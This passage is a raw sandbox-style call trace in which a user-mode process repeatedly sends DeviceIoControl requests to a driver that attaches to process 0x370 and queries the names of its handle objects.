lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0223.826] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.826] PsAcquireProcessExitSynchronization () returned 0x0 [0223.826] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.826] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0223.826] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.826] PsReleaseProcessExitSynchronization () returned 0x2 [0223.826] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.826] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.826] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x57 [0223.826] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.826] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.826] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.826] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0223.827] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.827] PsAcquireProcessExitSynchronization () returned 0x0 [0223.827] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.827] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00135e760, HandleInformation=0x0) returned 0x0 [0223.827] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.827] PsReleaseProcessExitSynchronization () returned 0x2 [0223.827] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.827] ObQueryNameString (in: Object=0xfffff8a00135e760, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.827] ObfDereferenceObject (Object=0xfffff8a00135e760) returned 0x3 [0223.827] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.827] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.827] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.827] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.827] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.827] PsAcquireProcessExitSynchronization () returned 0x0 [0223.827] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.827] ObReferenceObjectByHandle (in: Handle=0x2cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.827] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.827] PsReleaseProcessExitSynchronization () returned 0x2 [0223.828] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.828] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.828] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.828] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.828] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.828] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.828] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0223.828] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.828] PsAcquireProcessExitSynchronization () returned 0x0 [0223.828] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.828] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003692340, HandleInformation=0x0) returned 0x0 [0223.828] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.828] PsReleaseProcessExitSynchronization () returned 0x2 [0223.828] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.828] ObQueryNameString (in: Object=0xfffffa8003692340, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.828] ObfDereferenceObject (Object=0xfffffa8003692340) returned 0x1 [0223.828] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.828] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.828] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.828] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0223.828] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.828] PsAcquireProcessExitSynchronization () returned 0x0 [0223.829] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.829] ObReferenceObjectByHandle (in: Handle=0x3bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800368f190, HandleInformation=0x0) returned 0x0 [0223.829] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.829] PsReleaseProcessExitSynchronization () returned 0x2 [0223.829] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.829] ObQueryNameString (in: Object=0xfffffa800368f190, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.829] ObfDereferenceObject (Object=0xfffffa800368f190) returned 0x1 [0223.829] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.829] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.829] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.829] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0223.829] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.829] PsAcquireProcessExitSynchronization () returned 0x0 [0223.829] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.829] ObReferenceObjectByHandle (in: Handle=0x480, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036d43c0, HandleInformation=0x0) returned 0x0 [0223.829] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.829] PsReleaseProcessExitSynchronization () returned 0x2 [0223.829] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.829] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.829] ObfDereferenceObject (Object=0xfffffa80036d43c0) returned 0x12 [0223.829] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.830] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.830] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.830] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0223.830] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.830] PsAcquireProcessExitSynchronization () returned 0x0 [0223.830] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.830] ObReferenceObjectByHandle (in: Handle=0x498, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036ca3d0, HandleInformation=0x0) returned 0x0 [0223.830] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.830] PsReleaseProcessExitSynchronization () returned 0x2 [0223.830] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.830] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.830] ObfDereferenceObject (Object=0xfffffa80036ca3d0) returned 0x1 [0223.830] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.830] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.830] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.830] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0223.830] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.830] PsAcquireProcessExitSynchronization () returned 0x0 [0223.830] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.830] ObReferenceObjectByHandle (in: Handle=0x49c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036c8730, HandleInformation=0x0) returned 0x0 [0223.830] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.830] PsReleaseProcessExitSynchronization () returned 0x2 [0223.830] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.830] ObQueryNameString (in: Object=0xfffffa80036c8730, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.830] ObfDereferenceObject (Object=0xfffffa80036c8730) returned 0x1 [0223.830] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.831] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.831] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.831] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.831] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.831] PsAcquireProcessExitSynchronization () returned 0x0 [0223.831] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.831] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036c8070, HandleInformation=0x0) returned 0x0 [0223.831] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.831] PsReleaseProcessExitSynchronization () returned 0x2 [0223.831] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.831] ObQueryNameString (in: Object=0xfffffa80036c8070, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.831] ObfDereferenceObject (Object=0xfffffa80036c8070) returned 0x2 [0223.831] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.831] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.831] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.831] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0223.831] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.831] PsAcquireProcessExitSynchronization () returned 0x0 [0223.831] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.831] ObReferenceObjectByHandle (in: Handle=0x4a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e6f070, HandleInformation=0x0) returned 0x0 [0223.831] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.831] PsReleaseProcessExitSynchronization () returned 0x2 [0223.831] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.831] ObQueryNameString (in: Object=0xfffffa8002e6f070, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.831] ObfDereferenceObject (Object=0xfffffa8002e6f070) returned 0x2 [0223.831] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.831] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.832] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.832] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0223.832] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.832] PsAcquireProcessExitSynchronization () returned 0x0 [0223.832] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.832] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036ce730, HandleInformation=0x0) returned 0x0 [0223.832] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.832] PsReleaseProcessExitSynchronization () returned 0x2 [0223.832] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.832] ObQueryNameString (in: Object=0xfffffa80036ce730, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.832] ObfDereferenceObject (Object=0xfffffa80036ce730) returned 0x1 [0223.832] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.832] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.832] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.832] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.832] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.832] PsAcquireProcessExitSynchronization () returned 0x0 [0223.832] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.832] ObReferenceObjectByHandle (in: Handle=0x4c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036fb730, HandleInformation=0x0) returned 0x0 [0223.832] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.832] PsReleaseProcessExitSynchronization () returned 0x2 [0223.832] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.832] ObQueryNameString (in: Object=0xfffffa80036fb730, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.832] ObfDereferenceObject (Object=0xfffffa80036fb730) returned 0x2 [0223.833] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.833] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.833] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.833] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.833] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.833] PsAcquireProcessExitSynchronization () returned 0x0 [0223.833] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.833] ObReferenceObjectByHandle (in: Handle=0x4c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036ea070, HandleInformation=0x0) returned 0x0 [0223.833] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.833] PsReleaseProcessExitSynchronization () returned 0x2 [0223.833] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.833] ObQueryNameString (in: Object=0xfffffa80036ea070, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.833] ObfDereferenceObject (Object=0xfffffa80036ea070) returned 0x2 [0223.833] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.833] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.833] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.833] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0223.833] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.833] PsAcquireProcessExitSynchronization () returned 0x0 [0223.833] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.833] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036e9730, HandleInformation=0x0) returned 0x0 [0223.833] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.833] PsReleaseProcessExitSynchronization () returned 0x2 [0223.833] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.833] ObQueryNameString (in: Object=0xfffffa80036e9730, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.834] ObfDereferenceObject (Object=0xfffffa80036e9730) returned 0x2 [0223.834] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.834] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.834] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.834] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.834] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.834] PsAcquireProcessExitSynchronization () returned 0x0 [0223.834] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.834] ObReferenceObjectByHandle (in: Handle=0x4d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800375a070, HandleInformation=0x0) returned 0x0 [0223.834] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.834] PsReleaseProcessExitSynchronization () returned 0x2 [0223.834] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1e2 [0223.834] ObQueryNameString (in: Object=0xfffffa800375a070, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.834] ObfDereferenceObject (Object=0xfffffa800375a070) returned 0x2 [0223.834] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.834] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.834] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.834] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0223.834] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.834] PsAcquireProcessExitSynchronization () returned 0x0 [0223.834] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0223.834] ObReferenceObjectByHandle (in: Handle=0x4dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800375a300, HandleInformation=0x0) returned 0x0 [0223.834] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.834] PsReleaseProcessExitSynchronization () returned 0x2 